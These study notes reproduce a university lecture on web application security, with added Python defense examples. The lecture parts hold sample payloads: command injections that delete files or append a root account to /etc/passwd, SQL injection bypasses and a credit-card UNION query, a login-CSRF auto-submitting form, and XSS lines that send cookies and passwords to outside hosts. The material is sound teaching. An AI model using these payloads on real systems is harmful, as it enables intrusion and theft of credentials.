Web Application Security: Reported Web Vulnerabilities 'In the Wild', Study notes of Computer Networks

Web application security and reported web vulnerabilities 'in the wild'. It covers topics such as command injection, SQL injection, card system attacks, cross-site request forgery, and CSRF defenses. The document also provides examples of attacks and their goals, as well as ways to defend against them. It is a useful resource for students studying web application security and related topics.

Typology: Study notes

2022/2023

Uploaded on 05/11/2023

alfred67

CS 155 Spring 2010: Web Application Security, John Mitchell

Reported Web Vulnerabilities "In the Wild"
Data from an aggregator and validator of NVD-reported vulnerabilities. [Chart: counts per vulnerability class; values not recoverable from the extraction]

Command Injection
General code injection attacks. Attack goal: execute arbitrary code on the server.

Example: code injection based on eval (PHP), http://site.com/calc.php (server-side calculator):
  ...
  $in = $_GET['exp'];
  eval('$ans = ' . $in . ';');
  ...
Attack: http://site.com/calc.php?exp="10 ; system('rm *.*')" (URL encoded)

Code injection using system(). Example: PHP server-side code for sending email:
  $email = $_POST["email"];
  $subject = $_POST["subject"];
  system("mail $email -s $subject < /tmp/joinmynetwork");
Attacker can post
  http://yourdomain.com/mail.php?email=hacker@hackerhome.net&subject=foo < /usr/passwd; ls
or
  http://yourdomain.com/mail.php?email=hacker@hackerhome.net&subject=foo; echo "evil::0:0:root:/:/bin/sh" >> /etc/passwd; ls

Basic picture: SQL Injection
[Diagram: Attacker, Victim Server, Victim SQL DB]
  1. Attacker sends an unintended SQL query to the victim server
  2. The server passes it on to the victim SQL DB
  3. Attacker receives valuable data

CardSystems Attack
- CardSystems: credit card payment processing company
- SQL injection attack in June 2005
- put out of business
The Attack:
- 263,000 credit card #s stolen from database
- credit card #s stored unencrypted
- 43 million credit card #s exposed

April 2008 SQL Vulnerabilities
[Screenshot: Brian Krebs, "Security Fix" blog, "Hundreds of Thousands of Microsoft Web Servers Hacked"]
Hundreds of thousands of Web sites, including several at the United Nations and in the U.K. government, have been hacked recently and seeded with code that tries to exploit security flaws in Microsoft Windows to install malicious software on visitors' machines. The attackers appear to be breaking into the sites with the help of a security vulnerability in Microsoft's Internet Information Services (IIS) Web servers. In an alert issued last week, Microsoft said it was investigating reports of an unpatched flaw in IIS servers, but at the time it noted that it wasn't aware of anyone trying to exploit that particular weakness.
Update, April 29, 11:28 a.m. ET: In a post to one of its blogs, Microsoft says this attack was not the fault of a flaw in IIS: "...our investigation has shown that there are no new or unknown vulnerabilities being exploited. This wave is not a result of a vulnerability in Internet Information Services or Microsoft SQL Server. We have also determined that these attacks are in no way related to Microsoft Security Advisory (951306). The attacks are facilitated by SQL injection exploits and are not issues related to IIS 6.0, ASP, ASP.Net or Microsoft SQL technologies. SQL injection attacks enable malicious users to execute commands in an application's database. To protect against SQL injection attacks the developer of the Web site [...] over on the IIS blog have written a post with a wealth of information for web developers and IT Professionals can take to minimize their exposure to these types of attacks by minimizing the attack surface area in their code and server configurations." Shadowserver.org has a nice writeup with a great deal more information about the mechanics behind this attack, as does the SANS Internet Storm Center.

Web login
[Diagram: Browser (client) sends username & password to the web server, which queries the DB]
Normal query:
  SELECT * FROM Users WHERE user='me' AND pwd='1234'

Bad input
Suppose user = " ' or 1=1 -- " (URL encoded). Then the script does:
  ok = execute( SELECT ... WHERE user=' ' or 1=1 -- ... )
The "--" causes the rest of the line to be ignored. Now ok.EOF is always false and login succeeds. The bad news: easy login to many sites this way.
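The mail.php command injection and the login SQL injection from the slides above, each placed beside a hardened version, as an added Python example that is not from the lecture. The in-memory sqlite3 database, its Users table, the e-mail address pattern and the sample inputs are constructed for the demo; sqlite3 stands in for whatever DBMS the real site uses.

```python
import re
import shlex
import sqlite3

# ---- Command injection (the mail.php slide) ----

def mail_command_vulnerable(email: str, subject: str) -> str:
    # Mirrors the PHP: request fields are spliced into a shell command string,
    # so ';', '<', '>' and other metacharacters inside them are interpreted
    # by the shell as command structure, not as data.
    return f"mail {email} -s {subject} < /tmp/joinmynetwork"

def mail_command_safe(email: str, subject: str) -> str:
    # Hardened: each untrusted value is shell-quoted, so the shell sees it as
    # exactly one literal word, whatever characters it contains.
    return f"mail {shlex.quote(email)} -s {shlex.quote(subject)} < /tmp/joinmynetwork"

def mail_argv(email: str, subject: str) -> list:
    # Better still: an argument vector for subprocess.run(argv) with no shell
    # at all. The subject is a single argv element; nothing re-parses it.
    return ["mail", email, "-s", subject]

# Constructed positive specification for an address: reject anything that
# is not shaped like one before it gets near a command.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

def email_allowed(email: str) -> bool:
    return EMAIL_RE.fullmatch(email) is not None

# ---- SQL injection (the web login slide) ----

def make_db() -> sqlite3.Connection:
    # Constructed demo database: one user, password stored as on the slide.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (user TEXT, pwd TEXT)")
    conn.execute("INSERT INTO Users VALUES ('me', '1234')")
    conn.commit()
    return conn

def login_vulnerable(conn: sqlite3.Connection, user: str, pwd: str) -> bool:
    # String concatenation: the input becomes part of the SQL text, so a
    # quote closes the literal and "--" comments out the password check.
    query = "SELECT * FROM Users WHERE user='" + user + "' AND pwd='" + pwd + "'"
    rows = conn.execute(query).fetchall()
    return len(rows) > 0          # the slide's "ok.EOF is false"

def login_safe(conn: sqlite3.Connection, user: str, pwd: str) -> bool:
    # Parameterised query: the values travel separately from the SQL text,
    # so quotes and comment markers inside them are just characters.
    rows = conn.execute(
        "SELECT * FROM Users WHERE user=? AND pwd=?", (user, pwd)
    ).fetchall()
    return len(rows) > 0

def login_demo() -> dict:
    conn = make_db()
    bypass = "' or 1=1 --"        # the slide's bad input
    return {
        "vulnerable_legit": login_vulnerable(conn, "me", "1234"),
        "vulnerable_bypass": login_vulnerable(conn, bypass, "anything"),
        "safe_legit": login_safe(conn, "me", "1234"),
        "safe_bypass": login_safe(conn, bypass, "anything"),
    }

if __name__ == "__main__":
    evil = 'foo; echo "evil::0:0:root:/:/bin/sh" >> /etc/passwd; ls'
    print(mail_command_vulnerable("hacker@hackerhome.net", evil))
    print(mail_command_safe("hacker@hackerhome.net", evil))
    print(login_demo())
```

The sqlite3 driver happens to refuse more than one statement per execute() call, so the "DROP TABLE" variant from the next slide fails for that reason alone; that is a property of one driver, not a defense, and parameter binding is what actually keeps the input out of the SQL grammar.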
Even worse
Suppose user = " ' ; DROP TABLE Users -- ". Then the script does:
  ok = execute( SELECT ... WHERE user=' ' ; DROP TABLE Users ... )
Deletes the user table. Similarly: attacker can add users, reset pwds, etc.

Getting private info
[Screenshot: "View pizza order history: Month: Jan" form]
Query:
  "SELECT pizza, toppings, quantity, date FROM orders WHERE userid=" . $userid . " AND order_month=" . $_GET['month']
What if: month = " 0 AND 1=0 UNION SELECT name, CC_num, exp_mon, exp_year FROM creditcards "
[Screenshot: "Your Pizza Orders in October", credit card info compromised: cardholder names, card numbers and expiry years appear in the Pizza / Toppings / Quantity / Order Day columns]

Cross Site Request Forgery
Recall: session using cookies. Browser -> Server: POST /login.cgi; Server -> Browser: Set-cookie: authenticator.
Basic picture: [Diagram: User (victim), Attack Server, Victim Server; the attack server's page makes the user's browser send a request to the victim server carrying the user's cookie]
Q: how long do you stay logged on to Gmail?

Cookieless Example: Home Router
[Diagram: User, Bad web site, Home router]
Attack on Home Router
Fact [SRJ'07]: 50% of home users have a broadband router with a default or no password.
Drive-by Pharming attack: user visits malicious site
- JavaScript at the site scans the home network looking for the broadband router:
  • SOP allows "send only" messages
  • Detect success using onerror: <IMG SRC=192.168.0.1 onError = do() >
- Once found, login to router and change DNS server
Problem: "send-only" access is sufficient to reprogram the router.

CSRF Defenses
- Secret Validation Token: <input type=hidden value=23a3af01b>
- Referer Validation: Referer: http://www.facebook.com/home.php
- Custom HTTP Header: X-Requested-By: XMLHttpRequest

Referer Validation
[Screenshot: Facebook login page: "For your security, never enter your Facebook password on sites not located on Facebook.com." Email / Password / Remember me / Sign up for Facebook / Forgot your password?]

Referer Validation Defense
HTTP Referer header:
- Referer: http://www.facebook.com/ (legitimate)
- Referer: http://www.attacker.com/evil.html (forged)
- Referer: (missing) ?
Lenient Referer validation: doesn't work if Referer is missing.
Strict Referer validation: secure, but Referer is sometimes absent, ...

Referer Privacy Problems
Referer may leak privacy-sensitive information, e.g.
  http://intranet.corp.apple.com/projects/iphone/competitors.html
Common sources of blocking:
- Network stripping by the organization
- Network stripping by local machine
- Stripped by browser for HTTPS -> HTTP transitions
- User preference in browser
- Buggy user agents
Site cannot afford to block these users.

Broader view of CSRF
Abuse of cross-site data export feature:
- From user's browser to honest server
- Disrupts integrity of user's session
Why mount a CSRF attack?
- Network connectivity
- Read browser state
- Write browser state
Not just "session riding".

Login CSRF
[Diagram: Victim Browser, www.attacker.com, www.google.com]
Victim browser: GET /blog HTTP/1.1 to www.attacker.com, which returns:
  <form action=https://www.google.com/login method=POST target=invisibleframe>
    <input name=username value=attacker>
    <input name=password value=xyzzy>
  </form>
  <script>document.forms[0].submit()</script>
Victim browser to www.google.com:
  POST /login HTTP/1.1
  Referer: http://www.attacker.com/blog
  username=attacker&password=xyzzy
Response:
  HTTP/1.1 200 OK
  Set-Cookie: SessionID=ZA1Fa34
Later, from the same browser:
  GET /search?q=llamas HTTP/1.1
  Cookie: SessionID=ZA1Fa34
Web History for attacker: Apr 7, 2008 9:20pm, Searched for llamas.

Payments Login CSRF
[Screenshots: Sura-Sura Kanji Quizzer FAQ page (http://www.kanjiquizzer.com/help/faq.php) with a "support via PayPal donation" link; PayPal "Add a Bank Account in the United States" page]
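The three CSRF defenses listed above (secret validation token, Referer validation in lenient and strict mode, custom HTTP header) worked through as an added Python example that is not part of the lecture. The protected host name, the server key, the cookie name SessionID and the sample request dictionaries are constructed assumptions.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

SITE_HOST = "www.facebook.com"               # assumed host of the site being protected
SERVER_SECRET = b"constructed-demo-secret"   # stand-in for a random key kept only on the server

def make_csrf_token(session_id: str) -> str:
    # Secret validation token: an HMAC over the session id. A page served by
    # www.attacker.com never sees the session cookie or the server key, so it
    # cannot produce the value the site puts into <input type=hidden ...>.
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()

def token_valid(session_id: str, submitted) -> bool:
    expected = make_csrf_token(session_id)
    return hmac.compare_digest(expected, submitted or "")

def referer_valid(headers: dict, strict: bool) -> bool:
    # Referer validation. Lenient mode accepts a missing header (keeps users
    # whose Referer is stripped, but a forged request with no Referer passes);
    # strict mode rejects it. Compare the host name, not a string prefix,
    # so "www.facebook.com.attacker.com" does not match.
    ref = headers.get("Referer")
    if ref is None:
        return not strict
    return urlsplit(ref).hostname == SITE_HOST

def custom_header_valid(headers: dict) -> bool:
    # Custom header check: a cross-site <form> post cannot add headers;
    # only same-origin XMLHttpRequest code can set this one.
    return headers.get("X-Requested-By") == "XMLHttpRequest"

def request_allowed(req: dict, strict_referer: bool = False) -> bool:
    # Combined policy for a state-changing request: proof of origin via the
    # token (form posts) or the custom header (XHR), plus the Referer check.
    headers, form, cookies = req["headers"], req["form"], req["cookies"]
    session_id = cookies.get("SessionID", "")
    proof = token_valid(session_id, form.get("csrf_token")) or custom_header_valid(headers)
    return proof and referer_valid(headers, strict_referer)

# Constructed sample requests as the server would see them.
SESSION = "ZA1Fa34"

LEGIT_POST = {
    "headers": {"Referer": "http://www.facebook.com/home.php"},
    "form": {"status": "hello", "csrf_token": make_csrf_token(SESSION)},
    "cookies": {"SessionID": SESSION},
}

FORGED_POST = {
    # Submitted by a form on the attacker's page: the browser attaches the
    # victim's cookie, but there is no token and the Referer names the attacker.
    "headers": {"Referer": "http://www.attacker.com/blog"},
    "form": {"status": "pwned"},
    "cookies": {"SessionID": SESSION},
}

FORGED_NO_REFERER = {
    "headers": {},
    "form": {"status": "pwned"},
    "cookies": {"SessionID": SESSION},
}

if __name__ == "__main__":
    for label, req in [("legit", LEGIT_POST), ("forged", FORGED_POST), ("forged, no Referer", FORGED_NO_REFERER)]:
        print(label, "lenient:", request_allowed(req), "strict:", request_allowed(req, strict_referer=True))
```

For the login form itself (the login CSRF case above) the same token has to be bound to a pre-login session cookie, since the victim holds no account session yet when the attacker's page submits its own credentials.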
Login CSRF (continued)
The forged POST /login succeeds (HTTP/1.1 200 OK, Set-Cookie: SessionID=ZA1Fa34); the victim's later GET /search?q=llamas carries Cookie: SessionID=ZA1Fa34, and "Searched for llamas" (Apr 7, 2008 9:20pm) lands in the Web History of the attacker's account.
Sites can redirect browser.

Cross Site Scripting (XSS)
Three top web site vulnerabilities:
- SQL Injection: browser sends malicious input to server; bad input checking leads to a malicious SQL query. Attacker's malicious code executed on victim server.
- CSRF (Cross-site request forgery): bad web site sends a request to a good web site, using the credentials of an innocent victim who "visits" the site. Attacker site forges a request from the victim browser to the victim server.
- XSS (Cross-site scripting): bad web site sends an innocent victim a script that steals information from an honest web site. Attacker's malicious code executed on victim browser.

Basic scenario: reflected XSS attack
[Diagram: Attack Server (www.attacker.com), Victim Server (www.victim.com), Victim client; steps 1 to 5]
The attack server gets the victim client to request
  http://victim.com/search.php?term=<script> ... </script>
and the victim server echoes the term back:
  <html> Results for <script> window.open(http://attacker.com? ... document.cookie ...) </script> </html>
What is XSS?
An XSS vulnerability is present when an attacker can inject scripting code into pages generated by a web application.
Methods for injecting malicious code:
- Reflected XSS ("type 1"): the attack script is reflected back to the user as part of a page from the victim site
- Stored XSS ("type 2"): the attacker stores the malicious code in a resource managed by the web application, such as a database
- Others, such as DOM-based attacks

Basic scenario: reflected XSS attack, email version
[Diagram: Attack Server, Server Victim, User Victim; steps 1 to 5]
Here's how the attack works:
- Attacker locates a PDF file hosted on website.com
- Attacker creates a URL pointing to the PDF, with JavaScript Malware in the fragment portion:
    http://website.com/path/to/file.pdf#s=javascript:alert("xss");
- Attacker entices a victim to click on the link
- If the victim has Adobe Acrobat Reader Plugin 7.0.x or less (confirmed in Firefox and Internet Explorer), the JavaScript Malware executes
Note: alert is just an example. Real attacks do something worse.
And if that doesn't bother you ... PDF files on the local filesystem:
  file:///C:/Program%20Files/Adobe/Acrobat%207.0/Resource/ENUtxt.pdf#blah=javascript:alert("XSS");
JavaScript Malware now runs in local context with the ability to read local files ...

Reflected XSS attack
[Diagram: Attack Server, Server Victim, User Victim: "Send bad stuff", "Reflect it back"]

Stored XSS using images
Suppose pic.jpg on the web server contains HTML! A request for http://site.com/pic.jpg results in:
  HTTP/1.1 200 OK
  ...
  Content-Type: image/jpeg
  <html> fooled ya </html>
- IE will render this as HTML (despite Content-Type)
- Consider photo sharing sites that support image uploads
- What if attacker uploads an "image" that is a script?
DOM-based XSS (no server used)
Example page:
  <HTML><TITLE>Welcome!</TITLE>
  Hi
  <SCRIPT>
  var pos = document.URL.indexOf("name=") + 5;
  document.write(document.URL.substring(pos, document.URL.length));
  </SCRIPT>
  </HTML>
Works fine with this URL:
  http://www.example.com/welcome.html?name=Joe
But what about this one?
  http://www.example.com/welcome.html?name=<script>alert(document.cookie)</script>
(Amit Klein, "XSS of the Third Kind")

AJAX hijacking
- The AJAX programming model adds additional attack vectors to some existing vulnerabilities
- The client-centric model followed in many AJAX applications can help hackers, or even open security holes
- JavaScript allows functions to be redefined after they have been declared
...

Complex problems in social network sites
[Diagram: user data and user-supplied application; defenses at server. Attack Server, Server Victim, User Victim]

How to Protect Yourself (OWASP)
The best way to protect against XSS attacks:
- Ensure that your app validates all headers, cookies, query strings, form fields, and hidden fields (i.e., all parameters) against a rigorous specification of what should be allowed.
- Do not attempt to identify active content and remove, filter, or sanitize it. There are too many types of active content and too many ways of encoding it to get around filters for such content.
- We strongly recommend a 'positive' security policy that specifies what is allowed. 'Negative' or attack-signature-based policies are difficult to maintain and are likely to be incomplete.

ASP.NET output filtering
validateRequest (on by default):
- Crashes the page if it finds <script> in POST data
- Looks for a hardcoded list of patterns
- Can be disabled: <%@ Page validateRequest="false" %>

Caution: Scripts not only in <script>!
JavaScript as scheme in URI:
  <img src="javascript:alert(document.cookie);">
JavaScript On{event} attributes (handlers): OnSubmit, OnError, OnLoad, ...
Typical use:
  <img src="none" OnError="alert(document.cookie)">
  <iframe src=`https://bank.com/login` onload=`steal()`>
  <form action="logon.jsp" method="post" onsubmit="hackImg=new Image; hackImg.src='http://www.digicrime.com/'+document.forms(1).login.value+':'+document.forms(1).password.value;"> </form>

Problems with filters
Suppose a filter removes <script
- Good case: <script src=" ..." becomes src=" ..."
- But then: <scr<scriptipt src=" ..." becomes <script src=" ..."

Advanced anti-XSS tools
- Dynamic Data Tainting: Perl taint mode
- Static Analysis: analyze Java, PHP to determine possible flow of untrusted input
Client-side XSS defenses:
- Proxy-based: analyze the HTTP traffic exchanged between the user's web browser and the target web server by scanning for special HTML characters and encoding them before executing the page in the user's web browser
- Application-level firewall: analyze browsed HTML pages for hyperlinks that might lead to leakage of sensitive information and stop bad requests using a set of connection rules
- Auditing system: monitor execution of JavaScript code and compare the operations against high-level policies to detect malicious behavior

HttpOnly Cookies
(IE6 SP1, FF2.0.0.5; not Safari?)
Browser: GET ... -> Server. Server -> Browser, HTTP header:
  Set-cookie: NAME=VALUE ; HttpOnly
• Cookie sent over HTTP(S), but not accessible to scripts
• Cannot be read via document.cookie
• Also blocks access from XMLHttpRequest headers
• Helps prevent cookie theft via XSS ... but does not stop most other risks of XSS bugs.
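The "Problems with filters", OWASP positive-policy, DOM-based welcome page and HttpOnly slides above, worked through as one added Python example that is not from the lecture. The name specification, the minimal Set-Cookie parser and the sample inputs are constructed assumptions.

```python
import html
import re

# --- "Problems with filters": a blacklist that removes "<script" ---
SCRIPT_OPEN = re.compile(r"<script", re.IGNORECASE)

def naive_strip(s: str) -> str:
    # Single pass, as on the slide: "<scr<scriptipt" loses its inner "<script"
    # and what remains reads "<script" again.
    return SCRIPT_OPEN.sub("", s)

def strip_to_fixpoint(s: str) -> str:
    # Repeating until the text stops changing defeats that particular trick,
    # but the filter still knows nothing about onerror=, javascript: URIs or
    # alternative encodings, which is why OWASP advises against this approach.
    while True:
        out = SCRIPT_OPEN.sub("", s)
        if out == s:
            return out
        s = out

# --- OWASP "positive" policy: accept only what the specification allows ---
NAME_SPEC = re.compile(r"[A-Za-z][A-Za-z' -]{0,39}")   # constructed spec for a first name

def name_allowed(value: str) -> bool:
    return NAME_SPEC.fullmatch(value) is not None

def validate_name(value: str) -> str:
    if not name_allowed(value):
        raise ValueError("name does not match the allowed specification")
    return value

# --- Output encoding for the welcome page from the DOM-based XSS slide ---
def render_welcome(name: str) -> str:
    # Encode at the point of output: <, >, &, " and ' become entities, so the
    # browser shows them as text instead of parsing them as markup.
    return "<html><title>Welcome!</title>Hi " + html.escape(name, quote=True) + "</html>"

# --- HttpOnly: would document.cookie be able to read this cookie? ---
def parse_set_cookie(header_line: str):
    # Constructed minimal parser for "Set-Cookie: NAME=VALUE; attr; attr=val";
    # attribute names are case-insensitive, so they are lower-cased.
    body = header_line.split(":", 1)[1] if header_line.lower().startswith("set-cookie:") else header_line
    pieces = [p.strip() for p in body.split(";")]
    name, _, value = pieces[0].partition("=")
    attrs = {}
    for piece in pieces[1:]:
        if piece:
            key, _, val = piece.partition("=")
            attrs[key.strip().lower()] = val.strip()
    return name.strip(), value.strip(), attrs

def script_readable(header_line: str) -> bool:
    # Without HttpOnly, any script on the page, injected script included,
    # can read the cookie through document.cookie.
    return "httponly" not in parse_set_cookie(header_line)[2]

if __name__ == "__main__":
    probe = "<scr<scriptipt src='http://attacker.com/x.js'>"
    print(naive_strip(probe))
    print(strip_to_fixpoint(probe))
    print(render_welcome("<script>alert(document.cookie)</script>"))
    print(script_readable("Set-Cookie: SessionID=ZA1Fa34; HttpOnly"))
```

The two defenses that hold up are the positive check on input and the encoding on output; the filter functions are there to show why the slide's nested-tag input survives one pass, and why even the fixed-point version leaves the event-handler vectors from the previous slide untouched.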
Finding vulnerabilities
Survey of Web Vulnerability Tools: local and remote scanners, total retail price > $100K.
[Screenshot: example scanner UI, a security dashboard with device compliance, network scans in progress, vulnerabilities by severity and recent vulnerabilities]
Vulnerability Detection: overall detection rate of the scanners by category: Malware, Info leak, Config, Session, SQL 2nd order, SQL 1st order, CSRF, XCS, XSS advanced, XSS type 2, XSS type 1. [Chart; rates not recoverable from the extraction]

Additional solutions
Web Application Firewalls help prevent some attacks we discuss today:
• Cross site scripting
• SQL Injection
• Form field tampering
• Cookie poisoning
Sample products: Imperva, Kavado Interdo, F5 TrafficShield, Citrix NetScaler, CheckPoint Web Intel